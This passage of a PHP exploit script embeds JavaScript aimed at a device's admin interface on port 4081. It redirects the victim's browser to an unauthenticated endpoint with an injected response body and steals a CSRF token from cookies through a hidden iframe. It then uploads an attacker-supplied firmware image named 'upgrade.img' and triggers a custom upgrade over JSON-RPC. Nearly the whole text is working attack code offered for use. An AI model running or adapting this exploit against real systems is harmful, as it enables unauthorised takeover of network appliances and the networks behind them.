url = "https://' . $target . ':4081/admin"; _token = ""; _id = ""; function createIFrame(file, id) { iframe = document.createElement("iframe"); iframe.src = url + "/constants.js"; iframe.style.display = "none"; iframe.sandbox = "allow-scripts allow-same-origin"; iframe.onload = function() { cookie = iframe.contentWindow.document.cookie; var re = new RegExp(name + "=([^;]+)"); var value = re.exec(cookie); var token = (value != null) ? unescape(value[1]) : null; uploadImage(file, id, token); }; document.body.appendChild(iframe); } function uploadImage(file, id, token) { _id = id; _token = token; var xhr = new XMLHttpRequest(); xhr.open("POST", url + "/api/jsonrpc/", true); xhr.addEventListener("load", performCustomUpgrade); xhr.setRequestHeader("X-Token", token); xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xhr.setRequestHeader("Content-Type", "application/json"); xhr.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}})); } function performCustomUpgrade() { var xhr = new XMLHttpRequest(); xhr.open("POST", url +"/api/jsonrpc/", true); xhr.setRequestHeader("X-Token", _token); xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xhr.setRequestHeader("Content-Type", "application/json"); xhr.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id}})); } var xhr = new XMLHttpRequest(); xhr.open("POST", url + "/api/jsonrpc/upload/", true); xhr.addEventListener("load", function() { obj = JSON.parse(this.responseText); file = obj.result.fileUpload.name; id = obj.result.fileUpload.id; createIFrame(file, id); }); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1337"); xhr.withCredentials = true; var body = "-----------------------------1337\r\n" + "Content-Disposition: form-data; name=\"uploadImage\"; filename=\"upgrade.img\" \r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + atob("' . $upgrade . '") + "\r\n-----------------------------1337--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); '; $body = zlib_encode($body, ZLIB_ENCODING_DEFLATE); $payload = (preg_match("/Firefox/", $_SERVER["HTTP_USER_AGENT"])) ? "resource://xss" : ""; $payload .= "\nContent-Length: " . strlen($body); $payload .= "\n\n{$body}"; header("Location: https://{$target}:4081/nonauth/guestConfirm.cs?dest=" . urlencode(base64_encode($payload))); ?>